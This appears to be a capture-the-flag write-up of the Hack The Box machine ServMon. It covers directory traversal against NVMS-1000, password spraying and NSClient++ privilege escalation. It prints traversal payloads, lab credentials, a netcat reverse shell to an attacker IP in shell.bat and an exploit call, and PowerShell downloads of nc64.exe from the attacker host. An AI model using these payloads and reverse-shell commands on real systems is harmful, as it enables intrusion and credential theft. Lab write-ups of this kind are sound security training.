ServMon

Status Completed

Nmap Scan

[~/HTB/ServMon] - hak101> nmap --min-rate 10000 -p- 10.10.10.184

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-05 01:05 EDT
Nmap scan report for 10.10.10.184
Host is up (0.13s latency).
Not shown: 65518 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5666/tcp open nrpe
6063/tcp open x11
6699/tcp open napster
8443/tcp open https-alt
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown

ServMon 1
 49669/tcp open unknown
49670/tcp open unknown

[~/HTB/ServMon] - hak101> nmap 10.10.10.184 -p 21,22,80,135,139,445,5666,6

063,6699,8443,49664,49665,49666,49667,49668,49669,49670 -sV -sC -vv
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22 07:35PM <DIR> Users
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh syn-ack ttl 127 OpenSSH for_Windows_8.0 (protocol
2.0)
80/tcp open http syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5666/tcp open tcpwrapped syn-ack ttl 127
6063/tcp open x11? syn-ack ttl 127
6699/tcp open napster? syn-ack ttl 127
8443/tcp open ssl/https-alt syn-ack ttl 127
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

As we can see that there’s port 80 open possibly having a webpage which we will
check out first

ServMon 2
 Seems to be a login portal of some sort, Default credentials like admin:admin didn’t
work, nothing much to do here
Next we can check for shares

[~/HTB/ServMon] - hak101> netexec smb 10.10.10.184 -u '.' -p '' --shares

[~/HTB/ServMon] - hak101> netexec smb 10.10.10.184 -u '' -p '' --shares

Not able to get any shares, since there’s a website we can try directory brute-
forcing

No luck here too!

ServMon 3
 [~/HTB/ServMon] - hak101> dirsearch -u http://10.10.10.184 -x 404

Since FTP port is also open we can try to do anonymous login

We were able to anonymously login to ftp, and we can see a file named
confidential.txt in the Nadine folder, so we can download it

ftp> get Confidential.txt

In the file we can see a simple instructions list

ServMon 4
 Looking in the other user directory we can see a file named 'Notes to do.txt’ in the
use Nathan

Contents of that file:

Next let’s look at the burp response for the login request

We can see that it gives a customized error code, we could probably search for
exploits as the software is nvms-1000 shown in page tab itself

searchsploit nvms 1000

ServMon 5
 There’s two results for software, and both are directory traversal, which leads us
to the next path for exploiting

We can confirm the attack by modifying the header with directory traversal
payloads like:

/../../../../../../../../../../../../windows/win.ini which works!!!

We can also check out the other webserver running in port 8443

https://10.10.10.184:8443

Visiting the website doesn’t give us much, but we get to know the software its
running NSClient

ServMon 6
 Note: This website is quite messed up and annoying

We can search for some possible exploits again with searchsploit

searchsploit NSClient

Searching online for exploits we can see that those are mostly privilege exploits
and we need to find some credentials for the privilege escalation
We have to do more directory traversal for , and we also have a clue from the text
file we got earlier in the ftp login, that Password.txt was left in the desktop folder
this message was sent by Nadine and there’s only 2 users, so we need to check
Nathans Desktop directory
/../../../../../../../../../../../../users/nathan/desktop/passwords.txt

We get a bunch of passwords, we can save them to the list and check we can get
a possible authentication

ServMon 7
 Once saved we can use netexec to password spray to check for authentication

netexec smb 10.10.10.184 -u users -p passwords.txt

We got a successful authentication

Nadine:L1k3B1gBut7s@W0rk

We can try to ssh into that account

We get access

ServMon 8
 User Flag

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt

f840e73b56abc3d6b8915d06ae98****

Now that we got the initials access we can do Priv esc with the exploit that we
found earlier, searching the box up a little more we can see more credentials for
the web page in the C:\Program Files\NSClient++ directory

ew2x6SsGTxjRwXOT

We could have also used this command:

nscp web -- password --display

But to access the web server we need to access from the internal network of the
box, to do that we will connect using a tool called sshpass

sshpass -p 'L1k3B1gBut7s@W0rk' ssh [email protected] -L 8443:127.0.0.1:8

443

We get the shell again

ServMon 9
 And this time we are able to access the web page by going to https://127.0.0.1:8443/

We can enter the credentials that we got from the nsclient.ini

And it worked!

ServMon 10
 Now we need to have 2 files for the privilege escalation exploit, 1. is the nc64.exe
which can be downloaded, 2. Also we need to create a shell.bat file to execute the
nc64.exe

shell.bat:

\programdata\nc.exe 10.10.14.24 443 -e cmd

Next we need to upload the files to \programdata\ directory, we can do this by

starting a python http server and using wget command to get the files

[~/HTB/ServMon] - hak101> python -m http.server 80

Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

On the server

nadine@SERVMON C:\ProgramData> powershell wget http://10.10.14.3/nc64.e

xe -outfile nc.exe
nadine@SERVMON C:\ProgramData> powershell wget http://10.10.14.3/shell.b
at -outfile shell.bat

Once executed we can see that the files have been uploaded successfully

Then we can head to Settings > external scripts > scripts, and then “+Add new” in
the web page

ServMon 11
 We can add a command then specify the path to our script, we will use df for
default, then for key we will mention command and then in value the path to out
bat script

ServMon 12
 Once we click on add we can see that its been added, next we can create a
schedule for this script by going in the scheduler > schedules and do the following
configurations

Now lets click on add, then with the edit functions we can change some this like
seen before

ServMon 13
 Add again then go to the Control tab and reload, before u do this set up the
reverse shell listener

[~/HTB/ServMon] - hak101> rlwrap nc -lvnp 443

listening on [any] 443 ...

It just keeps loading for a long time with no output, we have to try a different
approach, we can try to use some exploit from github like

https://github.com/xtizi/NSClient-0.5.2.35---Privilege-Escalation

Executing the script:

[~/HTB/ServMon/NSClient-0.5.2.35---Privilege-Escalation] - hak101> python3

exploit.py "C:\programdata\nc.exe 10.10.14.3 443 -e cmd.exe" https://127.0.0.1:
8443 ew2x6SsGTxjRwXOT

Netcat listener:

ServMon 14
 [~/HTB/ServMon] - hak101> nc -nvlp 443
listening on [any] 443 ...

And we get a reverse connection!

Root Flag

C:\Users\Administrator\Desktop>type root.txt
type root.txt
0d5661e73bb694415f4b991e94a7****

ServMon 15